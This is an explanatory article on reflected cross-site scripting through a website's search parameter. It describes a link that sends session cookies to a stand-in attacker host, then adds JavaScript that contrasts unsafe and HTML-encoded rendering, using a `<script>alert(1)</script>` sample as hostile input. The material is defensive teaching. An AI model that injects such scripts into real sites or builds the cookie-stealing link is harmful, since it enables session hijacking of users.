Cross-site scripting, also known as XSS or CSS, is a security vulnerability that occurs when an attacker injects a malicious script, generally browser-side code such as HTML markup or JavaScript, into a web application.
How does it work?
In an XSS attack, the attacker's objective is to steal the user's data by running a malicious script in the user's browser. The script is injected, through various means, into the content of the website the user is visiting.
Say a user searches for some text on a website; the request is then sent to the server in the form:
In the search results, the website returns the result along with what the user searched for, like:
You searched for howto
If the search functionality is vulnerable to XSS, the attacker can add the malicious script to the URL:
When the user clicks on this link, it redirects to the malicious website, i.e. https://cyberattacker.com, and all the browser data is sent directly to the attacker's computer, allowing the attacker to steal the session tokens/cookies.
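The search reflection described above, rendered once without output encoding and once with it, as an added example that is not code from the original page. The host `example.test`, the parameter name `q`, the function names and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: the "You searched for ..." reflection, unsafe vs. encoded.
// Assumptions (not from the page): host example.test, query parameter "q".

// Encode the characters that let text break out of an HTML text or
// attribute context. Single pass, so "&" is never double-encoded.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Extract the search term from the request URL. URL decoding happens here,
// which is why percent-encoded markup in a link still reaches the page as markup.
function searchTerm(requestUrl) {
  return new URL(requestUrl).searchParams.get("q") ?? "";
}

// Vulnerable pattern: the decoded term is concatenated into HTML as-is,
// so the browser parses any markup in it as part of the page.
function renderUnsafe(requestUrl) {
  return `<p>You searched for ${searchTerm(requestUrl)}</p>`;
}

// Hardened pattern: the term is HTML-encoded at the point of output,
// so the browser displays it as text instead of interpreting it.
function renderSafe(requestUrl) {
  return `<p>You searched for ${escapeHtml(searchTerm(requestUrl))}</p>`;
}

// Constructed sample requests: the page's benign search and a harmless marker script.
const benign = "https://example.test/search?q=howto";
const hostile =
  "https://example.test/search?q=" + encodeURIComponent("<script>alert(1)</script>");

function demo() {
  return {
    benignSafe: renderSafe(benign),
    hostileUnsafe: renderUnsafe(hostile),
    hostileSafe: renderSafe(hostile),
  };
}

console.log(demo());
```

Encoding at output is the fix for this reflection point; marking session cookies `HttpOnly` additionally keeps them out of reach of any script that does run.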